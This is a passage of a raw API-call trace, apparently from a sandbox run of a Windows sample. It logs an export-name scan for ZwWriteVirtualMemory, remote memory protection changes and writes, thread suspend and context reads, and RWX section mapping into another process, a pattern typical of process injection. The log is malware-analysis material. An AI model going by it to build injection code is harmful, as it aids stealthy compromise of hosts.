lstrcmpA (lpString1="NtAlpcSetInformation", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtApphelpCacheControl", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtAreMappedFilesTheSame", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtAssignProcessToJobObject", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtAssociateWaitCompletionPacket", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtCallbackReturn", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtCancelIoFile", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtCancelIoFileEx", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtCancelSynchronousIoFile", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtCancelTimer", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtCancelTimer2", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtCancelWaitCompletionPacket", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtClearEvent", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtClose", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtCloseObjectAuditAlarm", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtCommitComplete", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtCommitEnlistment", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtCommitTransaction", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtCompactKeys", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtCompareObjects", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtCompareTokens", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtCompleteConnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0136.277] lstrcmpA (lpString1="NtCompressKey", lpString2="ZwWriteVirtualMemory") returned -1 [0136.277] lstrcmpA (lpString1="NtConnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0136.277] VirtualFree (lpAddress=0xa90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.376] NtProtectVirtualMemory (in: ProcessHandle=0x174, BaseAddress=0x19f078*=0x7ff6bac63980, NumberOfBytesToProtect=0x19f080, NewAccessProtection=0x4, OldAccessProtection=0x19f070 | out: BaseAddress=0x19f078*=0x7ff6bac63000, NumberOfBytesToProtect=0x19f080, OldAccessProtection=0x19f070*=0x20) returned 0x0 [0136.438] NtWriteVirtualMemory (in: ProcessHandle=0x174, BaseAddress=0x7ff6bac63980, Buffer=0x19f5c0*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x19f068 | out: Buffer=0x19f5c0*, NumberOfBytesWritten=0x19f068*=0x4) returned 0x0 [0136.830] NtProtectVirtualMemory (in: ProcessHandle=0x174, BaseAddress=0x19f078*=0x7ff6bac63000, NumberOfBytesToProtect=0x19f080, NewAccessProtection=0x20, OldAccessProtection=0x19f070 | out: BaseAddress=0x19f078*=0x7ff6bac63000, NumberOfBytesToProtect=0x19f080, OldAccessProtection=0x19f070*=0x4) returned 0x0 [0136.982] CloseHandle (hObject=0x17c) returned 1 [0136.982] ResumeThread (hThread=0x16c) returned 0x1 [0136.982] Sleep (dwMilliseconds=0x12c) [0139.343] SuspendThread (hThread=0x16c) returned 0x0 [0139.343] NtGetContextThread (in: ThreadHandle=0x16c, Context=0x19f0e0 | out: Context=0x19f0e0*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x100003, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x1, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x54, [73]=0x52, [74]=0xba, [75]=0x28, [76]=0xfb, [77]=0x7f, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0xcf1d8, Edi=0x0, Esi=0x800000, Ebx=0x0, Edx=0x805a10, Ecx=0x0, Eax=0x25f000, Ebp=0x0, Eip=0xcf1d8, SegCs=0x0, EFlags=0x800000, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x46, [5]=0x2, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x60, [21]=0xf3, [22]=0xc, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0xb0, [29]=0x58, [30]=0x80, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x60, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x54, [45]=0x52, [46]=0xba, [47]=0x28, [48]=0xfb, [49]=0x7f, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0139.352] ResumeThread (hThread=0x16c) returned 0x1 [0139.352] Sleep (dwMilliseconds=0x12c) [0139.787] SuspendThread (hThread=0x16c) returned 0x0 [0139.788] NtGetContextThread (in: ThreadHandle=0x16c, Context=0x19f0e0 | out: Context=0x19f0e0*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x100003, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x47, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x30, [65]=0xc7, [66]=0x58, [67]=0xd7, [68]=0xfe, [69]=0xf, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0xe0, [74]=0x25, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x400004, SegGs=0x10000, SegFs=0xbac63980, SegEs=0x7ff6, SegDs=0xcff58, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x25e000, Ecx=0x0, Eax=0x25e000, Ebp=0x0, Eip=0x25e000, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x80, [45]=0x39, [46]=0xc6, [47]=0xba, [48]=0xf6, [49]=0x7f, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0139.788] NtCreateSection (in: SectionHandle=0x19f088, DesiredAccess=0xf001f, ObjectAttributes=0x19f064*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), MaximumSize=0x19f07c, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19f088*=0x17c) returned 0x0 [0139.788] NtMapViewOfSection (in: SectionHandle=0x17c, ProcessHandle=0xffffffff, BaseAddress=0x19f084*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x19f038*=0, ViewSize=0x19f040*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19f084*=0xa90000, SectionOffset=0x19f038*=0, ViewSize=0x19f040*=0x9c000) returned 0x0 [0139.794] RtlNtStatusToDosError (Status=0x0) returned 0x0 [0139.809] NtMapViewOfSection (in: SectionHandle=0x17c, ProcessHandle=0x174, BaseAddress=0x19f0b8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x19f080*=0, ViewSize=0x19f088*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19f0b8*=0x680000, SectionOffset=0x19f080*=0, ViewSize=0x19f088*=0x9c000) returned 0x0 [0139.814] RtlNtStatusToDosError (Status=0x0) returned 0x0 [0139.815] GetModuleHandleW (lpModuleName="NTDLL.DLL") returned 0x778f0000 [0139.815] GetProcAddress (hModule=0x778f0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77968930 [0139.815] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x174, ProcessInformationClass=0x0, ProcessInformation64=0x19ef8c, ProcessInformationLength=0x30, ReturnLength=0x19efe4 | out: ProcessInformation64=0x19ef8c, ReturnLength=0x19efe4) returned 0x0 [0139.816] LocalAlloc (uFlags=0x0, uBytes=0x200) returned 0x629120 [0139.816] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x61df68 [0139.816] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x25e000, Buffer=0x0, BufferSize=0x61df68, NumberOfBytesRead=0x28 | out: Buffer=0x0, NumberOfBytesRead=0x28) returned 0x0 [0139.816] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28c45200, Buffer=0x7ffb, BufferSize=0x61df90, NumberOfBytesRead=0x40 | out: Buffer=0x7ffb, NumberOfBytesRead=0x40) returned 0x0 [0139.816] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x803460, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0139.816] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x8032d0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0139.817] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x803910, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0139.817] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x803e10, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0139.817] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x805270, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0139.817] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x805460, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0139.817] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x805880, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0139.818] LocalFree (hMem=0x629120) returned 0x0 [0139.818] LocalFree (hMem=0x61df68) returned 0x0 [0139.818] VirtualAlloc (lpAddress=0x0, dwSize=0x7e4, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000 [0139.943] GetModuleHandleW (lpModuleName="NTDLL.DLL") returned 0x778f0000 [0139.944] GetProcAddress (hModule=0x778f0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77968930 [0139.944] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x174, ProcessInformationClass=0x0, ProcessInformation64=0x19ef8c, ProcessInformationLength=0x30, ReturnLength=0x19efe4 | out: ProcessInformation64=0x19ef8c, ReturnLength=0x19efe4) returned 0x0 [0139.944] LocalAlloc (uFlags=0x0, uBytes=0x200) returned 0x629120 [0139.944] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x61df68 [0139.944] 